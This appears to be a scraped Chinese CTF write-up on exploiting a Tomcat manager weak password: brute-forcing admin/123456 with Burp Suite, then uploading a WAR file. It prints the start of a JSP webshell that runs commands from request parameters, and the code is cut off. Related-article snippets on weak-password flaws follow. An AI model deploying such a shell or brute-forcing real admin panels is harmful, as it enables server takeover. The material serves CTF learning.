根据题意

进入环境,随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456

登录进去过后,发现有一个上传界面,根据解题方向上传一个war木马即可:

war木马的制作过程:
jsp木马源码
<%
if(“023”.equals(request.getParameter(“pwd”))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“i”)).getInputStream();
int a = -1;
b

CTF-Tomcat后台弱口令漏洞利用相关推荐

  1. 墨者学院tomcat后台弱口令漏洞利用

    墨者学院tomcat后台弱口令漏洞利用 点击之后要我们登录,这里abc123:999user是base64解码之后的结果,可见要爆破base64编码,这里不写爆破过程了,下一期出一下爆破过程,这里直接 ...

  2. 服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验

    1.在XP系统上搭建Tomcat服务器平台: 2.在另一台虚拟机上利用弱口令漏洞上传木马程序,使得XP系统中木马. 实验步骤 一.搭建Tomcat服务器平台 1.安装JAVAJDK 环境变量的配置:( ...

  3. XXL-JOB任务调度中心后台默认弱口令漏洞

    1.漏洞描述 XXL-JOB任务调度中心后台存在默认弱口令漏洞,攻击者可通过输入默认的弱口令,进入后台,可进行进一步攻击. 2.资产查找 FOFA:app="XXL-JOB" || ...

  4. weblogic修改banner_WEBLogic默认账号弱口令及利用方法.doc

    WEBLogic默认账号弱口令及利用方法 WEBLogic默认账号弱口令的利用方法 文章引用作者:Mickey [I.S.T.O.]&hackest [H.S.T.] 发表在<黑客X档案 ...

  5. WebCrack:网站后台弱口令批量检测工具

    经过这么长时间的测试终于算是可以上线了,写篇文章跟大家分享一下自己的开发思路吧 >注:本工具借鉴吸收了TideSec的web_pwd_common_crack很多优秀的思路,在此基础上增加了很多 ...

  6. kingdee漏洞金蝶云星空存在弱口令漏洞

    kingdee漏洞简介 金蝶云星是基于云计算.大数据.社交.人工智能.物联网等前沿技术研发的新一代战略性企业管理软件.金蝶云星空存在弱口令漏洞,攻击者利用该漏洞登录系统后台,获取敏感信息. CNNVD ...

  7. Kali系统MSF模块暴力破解MySQL弱口令漏洞

    一.实验环境 1.攻击方: 攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简 ...

  8. SNMP弱口令漏洞的使用

    参考地址: 地址:https://www.cnblogs.com/-wenli/p/9571057.html https://www.cnblogs.com/Fluorescence-tjy/p/10 ...

  9. cmd 220 ftp 远程主机关闭连接_针对一些弱口令漏洞的解决办法——设置远程管理登录的配置...

    弱口令漏洞描述 弱口令的漏洞的存在很大原因上是因为使用者的不良使用习惯导致的,当然也有一些是因为系统或者应用启用时未设置可用账户的密码信息而使用默认的配置:这就给攻击者毫不费力攻进信息系统的机会了. ...

最新文章

  1. iceberg问题小结
  2. postman请求soap 请求_postman测试调用web service asmx
  3. 《从问题到程序:用Python学编程和计算》——第2章 计算和编程初步 2.1 数值表达式和算术...
  4. 独家 | 一文读懂人工神经网络
  5. MySQL、Oracle、SQL Server
  6. BlockChain:BlockChain周边概念详解+个人理解
  7. java网页中url传值的转码
  8. oracle索引使用例子,Oracle中利用函数索引处理数据倾斜案例
  9. python replace()
  10. matlab自带python_在matlab中直接在python中使用sklearn
  11. matlab中get和set命令,关于matlab中get和set的用法(转)
  12. g++: command not found
  13. Sum nyoj215
  14. mysql 小数点多余0_mysql中如何去除小数点后面多余的0
  15. oracle设置查看格式,Oracle 设置显示格式
  16. oracle dbview用户,关于SQLRecoverableException问题的排查和分析
  17. L1-041 寻找250 (10分)
  18. 一文看懂预训练模型最新进展
  19. python 福利吧_段友福利:Python爬取段友之家贴吧图片和小视频
  20. python网络编程(基础含实现简易服务器代码)

热门文章

  1. 走出研发人员绩效考核和薪酬管理的困境
  2. Photoshop-人物眼球的美白和加深瞳孔
  3. Linux——我的Linux/Unix枕边书【命令篇】
  4. 5G To B是电信“大力丸“?
  5. 协力发展,共创未来丨热烈欢迎中电互联赴云恒调研指导
  6. java创建邮箱目录,Javamail新建邮件后,如何保存进已发送或草稿箱
  7. 保护程序员们的眼睛-MACTYPE渲染
  8. java接口的初始化
  9. 2022电大国家开放大学网上形考任务-理工英语2非免费(非答案)
  10. 论文写作word中怎么把所有数字和字母替换为times new roman